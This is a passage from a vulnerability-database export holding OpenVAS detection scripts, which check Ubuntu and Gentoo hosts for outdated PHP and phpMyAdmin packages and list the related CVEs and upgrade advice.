rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:32:03", "description": "PHP version smaller than 5.2.14 suffers from multiple vulnerabilities.", "cvss3": {}, "published": "2012-06-21T00:00:00", "type": "openvas", "title": "PHP Version < 5.2.14 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2225", "CVE-2010-2484", "CVE-2010-2097", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-2191", "CVE-2007-1581", "CVE-2010-2190", "CVE-2010-2101", "CVE-2010-1860", "CVE-2010-2100", "CVE-2010-1864", "CVE-2010-1862", "CVE-2010-0397"], "modified": "2018-07-09T00:00:00", "id": "OPENVAS:1361412562310110171", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310110171", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nopsec_php_5_2_14.nasl 10460 2018-07-09 07:50:03Z cfischer $\n#\n# PHP Version < 5.2.14 Multiple Vulnerabilities\n#\n# Authors:\n# Songhan Yu <syu@nopsec.com>\n#\n# Copyright:\n# Copyright NopSec Inc. 2012, http://www.nopsec.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.110171\");\n script_version(\"$Revision: 10460 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-09 09:50:03 +0200 (Mon, 09 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2007-1581\", \"CVE-2010-0397\", \"CVE-2010-1860\", \"CVE-2010-1862\", \"CVE-2010-1864\",\n \"CVE-2010-2097\", \"CVE-2010-2100\", \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\",\n \"CVE-2010-2225\", \"CVE-2010-2484\", \"CVE-2010-2531\", \"CVE-2010-3065\");\n script_bugtraq_id(38708, 40948, 41991);\n script_name(\"PHP Version < 5.2.14 Multiple Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright NopSec Inc. 2012\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\");\n\n script_tag(name:\"solution\", value:\"Update PHP to version 5.2.14 or later.\");\n\n script_tag(name:\"summary\", value:\"PHP version smaller than 5.2.14 suffers from multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"5.2.14\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.2.14\" );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:03", "description": "PHP version smaller than 5.3.3 suffers from multiple vulnerabilities.", "cvss3": {}, "published": "2012-06-21T00:00:00", "type": "openvas", "title": "PHP Version < 5.3.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2225", "CVE-2010-2484", "CVE-2010-2097", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-2191", "CVE-2007-1581", "CVE-2010-2190", "CVE-2010-3063", "CVE-2010-2101", "CVE-2010-3062", "CVE-2010-1860", "CVE-2010-3064", "CVE-2010-2100", "CVE-2010-1917", "CVE-2010-1864", "CVE-2010-1862", "CVE-2010-0397"], "modified": "2018-07-09T00:00:00", "id": "OPENVAS:1361412562310110182", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310110182", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nopsec_php_5_3_3.nasl 10460 2018-07-09 07:50:03Z cfischer $\n#\n# PHP Version < 5.3.3 Multiple Vulnerabilities\n#\n# Authors:\n# Songhan Yu <syu@nopsec.com>\n#\n# Copyright:\n# Copyright NopSec Inc. 2012, http://www.nopsec.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.110182\");\n script_version(\"$Revision: 10460 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-09 09:50:03 +0200 (Mon, 09 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2007-1581\", \"CVE-2010-0397\", \"CVE-2010-1860\", \"CVE-2010-1862\",\n \"CVE-2010-1864\", \"CVE-2010-1917\", \"CVE-2010-2097\", \"CVE-2010-2100\",\n \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\", \"CVE-2010-2225\",\n \"CVE-2010-2484\", \"CVE-2010-2531\", \"CVE-2010-3062\", \"CVE-2010-3063\",\n \"CVE-2010-3064\", \"CVE-2010-3065\");\n script_bugtraq_id(38708, 40461, 40948, 41991);\n script_name(\"PHP Version < 5.3.3 Multiple Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright NopSec Inc. 2012\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\");\n\n script_tag(name:\"solution\", value:\"Update PHP to version 5.3.3 or later.\");\n\n script_tag(name:\"summary\", value:\"PHP version smaller than 5.3.3 suffers from multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"5.3.3\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.3.3\" );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:35", "description": "The remote host is missing updates announced in\nadvisory GLSA 201201-01.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201201-01 (phpMyAdmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-7252", "CVE-2010-3055", "CVE-2011-0987", "CVE-2011-2508", "CVE-2011-2642", "CVE-2011-2505", "CVE-2010-3056", "CVE-2010-2958", "CVE-2011-4634", "CVE-2011-2718", "CVE-2011-4107", "CVE-2011-2643", "CVE-2011-2506", "CVE-2011-4782", "CVE-2011-2719", "CVE-2011-3646", "CVE-2011-2507", "CVE-2008-7251", "CVE-2011-4780", "CVE-2011-0986", "CVE-2010-3263", "CVE-2011-4064"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:136141256231070802", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070802", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201201_01.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70802\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2010-2958\", \"CVE-2010-3055\", \"CVE-2010-3056\", \"CVE-2010-3263\", \"CVE-2011-0986\", \"CVE-2011-0987\", \"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\", \"CVE-2011-2642\", \"CVE-2011-2643\", \"CVE-2011-2718\", \"CVE-2011-2719\", \"CVE-2011-3646\", \"CVE-2011-4064\", \"CVE-2011-4107\", \"CVE-2011-4634\", \"CVE-2011-4780\", \"CVE-2011-4782\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:41 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201201-01 (phpMyAdmin)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities were found in phpMyAdmin, the most severe\n of which allows the execution of arbitrary PHP code.\");\n script_tag(name:\"solution\", value:\"All phpMyAdmin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-3.4.9'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201201-01\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=302745\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=335490\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=336462\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=354227\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=373951\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=376369\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=387413\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=389427\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=395715\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-1.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-2.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-4.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-5.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-6.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-7.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-1.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-10.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-11.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-12.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-17.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-18.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-2.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-9.php\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201201-01.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(\"ge 3.4.9\"), vulnerable: make_list(\"lt 3.4.9\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:51:15", "description": "The remote host is missing updates announced in\nadvisory GLSA 201201-01.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201201-01 (phpMyAdmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-7252", "CVE-2010-3055", "CVE-2011-0987", "CVE-2011-2508", "CVE-2011-2642", "CVE-2011-2505", "CVE-2010-3056", "CVE-2010-2958", "CVE-2011-4634", "CVE-2011-2718", "CVE-2011-4107", "CVE-2011-2643", "CVE-2011-2506", "CVE-2011-4782", "CVE-2011-2719", "CVE-2011-3646", "CVE-2011-2507", "CVE-2008-7251", "CVE-2011-4780", "CVE-2011-0986", "CVE-2010-3263", "CVE-2011-4064"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70802", "href": "http://plugins.openvas.org/nasl.php?oid=70802", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities were found in phpMyAdmin, the most severe\n of which allows the execution of arbitrary PHP code.\";\ntag_solution = \"All phpMyAdmin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-3.4.9'\n 